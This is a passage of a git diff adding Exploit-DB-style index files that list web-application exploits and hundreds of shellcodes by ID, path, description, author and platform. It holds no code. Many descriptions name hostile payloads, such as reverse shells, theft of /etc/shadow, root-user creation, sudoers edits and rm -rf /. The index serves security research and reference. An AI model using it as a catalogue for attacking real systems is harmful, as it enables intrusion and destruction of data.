1.0.426 (Build 426) - Cross-Site Request Forgery",2017-11-01,"Zain Sabahat",webapps,php, +43108,exploits/php/webapps/43108.txt,"Ingenious School Management System 2.3.0 - 'friend_index' SQL injection",2017-11-01,"Giulio Comi",webapps,php, +43110,exploits/php/webapps/43110.txt,"WordPress Plugin JTRT Responsive Tables 4.1 - SQL Injection",2017-11-03,"Lenon Leite",webapps,php, +43113,exploits/xml/webapps/43113.txt,"Ladon Framework for Python 0.9.40 - XML External Entity Expansion",2017-11-03,"RedTeam Pentesting",webapps,xml, +43114,exploits/java/webapps/43114.py,"Oracle PeopleSoft Enterprise PeopleTools < 8.55 - Remote Code Execution Via Blind XML External Entity",2017-05-17,"Charles Fol",webapps,java, +43117,exploits/php/webapps/43117.txt,"WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass",2017-11-04,"Colette Chamberland",webapps,php, +43122,exploits/multiple/webapps/43122.txt,"Logitech Media Server 7.9.0 - 'favorites' Cross-Site Scripting",2017-11-03,"Dewank Pant",webapps,multiple, +43123,exploits/multiple/webapps/43123.txt,"Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting",2017-11-03,"Dewank Pant",webapps,multiple, +43128,exploits/php/webapps/43128.txt,"pfSense 2.3.1_1 - Command Execution",2017-11-07,s4squatch,webapps,php, +43129,exploits/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",webapps,windows,9090 +43136,exploits/php/webapps/43136.txt,"MyBB 1.8.13 - Remote Code Execution",2017-11-11,Pabstersac,webapps,php, +43137,exploits/php/webapps/43137.txt,"MyBB 1.8.13 - Cross-Site Scripting",2017-11-11,Pabstersac,webapps,php, +43138,exploits/php/webapps/43138.rb,"Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload",2017-11-13,0xFFFFFF,webapps,php, +43140,exploits/php/webapps/43140.txt,"Kirby CMS < 2.5.7 - Cross-Site Scripting",2017-11-13,"Ishaq Mohammed",webapps,php, +43155,exploits/php/webapps/43155.txt,"Zeta Components Mail 1.8.1 - Remote Code Execution",2017-11-16,MalwareBenchmark,webapps,php, +43158,exploits/hardware/webapps/43158.txt,"Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting",2017-11-17,"Keith Thome",webapps,hardware, +43177,exploits/multiple/webapps/43177.txt,"CommuniGatePro 6.1.16 - Cross-Site Scripting",2017-11-15,"Boumediene KADDOUR",webapps,multiple, +43188,exploits/hardware/webapps/43188.txt,"ZTE ZXDSL 831CII - Improper Access Restrictions",2017-11-27,"Ibad Shah",webapps,hardware, diff --git a/files_shellcodes.csv b/files_shellcodes.csv new file mode 100644 index 000000000..d32442794 --- /dev/null +++ b/files_shellcodes.csv @@ -0,0 +1,652 @@ +id,file,description,date,author,type,platform +14113,shellcodes/arm/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm +13241,shellcodes/aix/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix +13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd +13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc +13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86 +13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86 +13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86 +13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 +13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86 +13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86 +13250,shellcodes/bsd_x86/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 +13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 +13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 +13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 +13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 +13256,shellcodes/bsd_x86/13256.c,"BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd_x86 +13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86 +13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86 +13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86 +13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd +13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86 +13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86 +13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86 +13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86 +13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86 +13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86 +13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86 +13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86 +13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86 +13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,shellcode,freebsd_x86 +13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86 +13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86 +13274,shellcodes/freebsd_x86/13274.c,"FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes)",2004-09-26,preedator,shellcode,freebsd_x86 +13275,shellcodes/freebsd_x86/13275.c,"FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)",2004-09-26,dev0id,shellcode,freebsd_x86 +13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86 +13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86 +13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86 +13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64 +13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64 +13281,shellcodes/generator/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator +13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator +13283,shellcodes/generator/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator +13284,shellcodes/generator/13284.txt,"Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator +13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator +13286,shellcodes/generator/13286.c,"Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator +13288,shellcodes/generator/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,shellcode,generator +13289,shellcodes/generator/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator +13290,shellcodes/ios/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",shellcode,ios +13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware +13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",shellcode,hardware +13293,shellcodes/hardware/13293.txt,"Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware +13295,shellcodes/hp-ux/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux +13296,shellcodes/lin_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,lin_x86-64 +13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator +13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips +13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]); Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips +13300,shellcodes/linux_mips/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_mips +13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc +13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc +13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc +13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc +13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc +13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc +13307,shellcodes/lin_x86/13307.c,"Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,lin_x86 +13308,shellcodes/lin_x86/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)",2009-09-15,XenoMuta,shellcode,lin_x86 +13309,shellcodes/lin_x86/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,shellcode,lin_x86 +13310,shellcodes/lin_x86/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,lin_x86 +13311,shellcodes/lin_x86/13311.c,"Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,lin_x86 +13312,shellcodes/lin_x86/13312.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",shellcode,lin_x86 +13313,shellcodes/lin_x86/13313.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,lin_x86 +13314,shellcodes/lin_x86/13314.c,"Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",shellcode,lin_x86 +13315,shellcodes/lin_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",shellcode,lin_x86 +13316,shellcodes/lin_x86/13316.c,"Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,shellcode,lin_x86 +13317,shellcodes/lin_x86/13317.s,"Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,lin_x86 +13318,shellcodes/lin_x86/13318.s,"Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,lin_x86 +13319,shellcodes/lin_x86/13319.s,"Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,lin_x86 +13320,shellcodes/lin_x86-64/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,shellcode,lin_x86-64 +13321,shellcodes/lin_x86/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,shellcode,lin_x86 +13322,shellcodes/lin_x86/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,shellcode,lin_x86 +13323,shellcodes/lin_x86/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,shellcode,lin_x86 +13324,shellcodes/lin_x86/13324.c,"Linux/x86 - Read /etc/passwd Shellcode (65+ bytes)",2009-02-27,certaindeath,shellcode,lin_x86 +13325,shellcodes/lin_x86/13325.c,"Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",shellcode,lin_x86 +13326,shellcodes/lin_x86/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",shellcode,lin_x86 +13327,shellcodes/lin_x86/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,lin_x86 +13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator +13329,shellcodes/lin_x86/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,lin_x86 +13330,shellcodes/lin_x86/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,lin_x86 +13331,shellcodes/lin_x86/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,shellcode,lin_x86 +13332,shellcodes/lin_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,shellcode,lin_x86 +13333,shellcodes/lin_x86/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,shellcode,lin_x86 +13334,shellcodes/lin_x86/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,shellcode,lin_x86 +13335,shellcodes/lin_x86/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes)",2008-09-17,dun,shellcode,lin_x86 +13336,shellcodes/lin_x86/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",shellcode,lin_x86 +13337,shellcodes/lin_x86/13337.c,"Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,lin_x86 +13338,shellcodes/lin_x86/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,shellcode,lin_x86 +13339,shellcodes/lin_x86/13339.asm,"Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)",2008-08-18,0in,shellcode,lin_x86 +13340,shellcodes/lin_x86/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,lin_x86 +13341,shellcodes/lin_x86/13341.c,"Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,shellcode,lin_x86 +13342,shellcodes/lin_x86/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,shellcode,lin_x86 +13343,shellcodes/lin_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,lin_x86 +13344,shellcodes/lin_x86/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",shellcode,lin_x86 +13345,shellcodes/lin_x86/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",shellcode,lin_x86 +13346,shellcodes/lin_x86/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,lin_x86 +13347,shellcodes/lin_x86/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",shellcode,lin_x86 +13348,shellcodes/lin_x86/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",shellcode,lin_x86 +13349,shellcodes/lin_x86/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",shellcode,lin_x86 +13350,shellcodes/lin_x86/13350.c,"Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",shellcode,lin_x86 +13351,shellcodes/lin_x86/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",shellcode,lin_x86 +13352,shellcodes/lin_x86/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",shellcode,lin_x86 +13353,shellcodes/lin_x86/13353.c,"Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes)",2006-11-16,Revenge,shellcode,lin_x86 +13354,shellcodes/lin_x86/13354.c,"Linux/x86 - execve /bin/sh Shellcode (22 bytes)",2006-11-16,Revenge,shellcode,lin_x86 +13355,shellcodes/lin_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,shellcode,lin_x86 +13356,shellcodes/lin_x86/13356.c,"Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,shellcode,lin_x86 +13357,shellcodes/lin_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,lin_x86 +13358,shellcodes/lin_x86/13358.c,"Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,lin_x86 +13359,shellcodes/lin_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,lin_x86 +13360,shellcodes/lin_x86/13360.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,lin_x86 +13361,shellcodes/lin_x86/13361.c,"Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,lin_x86 +13362,shellcodes/lin_x86/13362.c,"Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,lin_x86 +13363,shellcodes/lin_x86/13363.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,lin_x86 +13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337/TCP) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator +13365,shellcodes/lin_x86/13365.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,lin_x86 +13366,shellcodes/lin_x86/13366.txt,"Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,lin_x86 +13367,shellcodes/lin_x86/13367.c,"Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,lin_x86 +13368,shellcodes/lin_x86/13368.c,"Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,lin_x86 +13369,shellcodes/lin_x86/13369.c,"Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,lin_x86 +13370,shellcodes/lin_x86/13370.c,"Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,lin_x86 +13371,shellcodes/lin_x86/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",shellcode,lin_x86 +13372,shellcodes/lin_x86/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",shellcode,lin_x86 +13373,shellcodes/lin_x86/13373.c,"Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,lin_x86 +13374,shellcodes/lin_x86/13374.c,"Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",shellcode,lin_x86 +13375,shellcodes/lin_x86/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",shellcode,lin_x86 +13376,shellcodes/lin_x86/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",shellcode,lin_x86 +13377,shellcodes/lin_x86/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",shellcode,lin_x86 +13378,shellcodes/lin_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",shellcode,lin_x86 +13379,shellcodes/lin_x86/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",shellcode,lin_x86 +13380,shellcodes/lin_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,lin_x86 +13381,shellcodes/lin_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,lin_x86 +13382,shellcodes/lin_x86/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,lin_x86 +13383,shellcodes/lin_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,lin_x86 +13384,shellcodes/lin_x86/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,lin_x86 +13385,shellcodes/lin_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,shellcode,lin_x86 +13386,shellcodes/lin_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,shellcode,lin_x86 +13387,shellcodes/lin_x86/13387.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)",2006-01-21,izik,shellcode,lin_x86 +13388,shellcodes/lin_x86/13388.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,lin_x86 +13389,shellcodes/lin_x86/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,lin_x86 +13390,shellcodes/lin_x86/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,shellcode,lin_x86 +13391,shellcodes/lin_x86/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,shellcode,lin_x86 +13392,shellcodes/lin_x86/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,shellcode,lin_x86 +13393,shellcodes/lin_x86/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,shellcode,lin_x86 +13394,shellcodes/lin_x86/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,shellcode,lin_x86 +13395,shellcodes/lin_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,lin_x86 +13396,shellcodes/lin_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,shellcode,lin_x86 